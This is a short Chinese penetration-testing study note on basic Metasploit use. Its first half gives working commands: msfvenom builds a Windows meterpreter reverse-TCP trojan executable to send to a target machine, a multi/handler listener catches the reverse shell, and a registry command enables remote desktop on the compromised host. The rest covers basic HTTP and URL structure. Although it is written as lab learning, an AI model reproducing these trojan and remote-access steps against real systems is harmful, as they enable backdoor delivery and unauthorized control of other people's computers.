2019-9-20:渗透测试,基础学习,笔记,metasploit的基础使用

使用kali下metasploit生成木马,控制windows系统

kali基于debin的数字取证系统,上面集成了很多渗透测试工具,前身为bt r3(BrackTrack)

Metasploit,是综合利用工具,使用Ruby开发,使用方便

msfconsole进入工具

MSF,依赖postgresql数据库,在使用MSF前要开启数据库

msfvenom:生成木马
msfvenon -p windows/meterpreter/reverse_tcp lhost=kali ip地址 lport=5555 -f exe > /root/desktop/muma.exe
-p,后边跟着payload,攻击成功之后要做什么事情
lhost,后跟监听的ip
lport,后跟监听端口
-f,表示要生产后门文件的类型
>,重定向到一个路径

将生成文件发送到靶子机

开启msfconsole,开启前打开数据库postgresql

exploits,开发利用,攻击某些服务,平台,系统等用到的工具,
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    show options,查看需要设置哪些参数
    set lhost 192.168.20.135
    run / exploit,启动监听

在靶子机上点击exe程序,在kaLi中就可以得到靶子的shell
    shell,获取靶机的shell
    ipconfig
    rdesktop 靶机ip,可以登录远程桌面

    REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f,开启3389远程

payloads,载荷载体,攻击成功之后要操作什么


HTTP协议
特点,简单快速,请求方式,get post head 等8种,无连接无状态
支持模式,B/S:B指的浏览器,S指的servce, C/S:websocket

URL,统一资源定位符,在网络中用来标识某处的资源
https:(协议)//www.baidu.com(域名):8080(端口)/s(虚拟目录)/index.php(文件名)?wd=burphelper(参数)#name(锚点部分)

request,请求包:请求行+请求头+空行+请求数据

http 1.0 请求方式 get ,post ,head
http 1.1 请求方式 get, post, head ,options, put ,delete ,trace ,connect

BP拦截HTTP请求包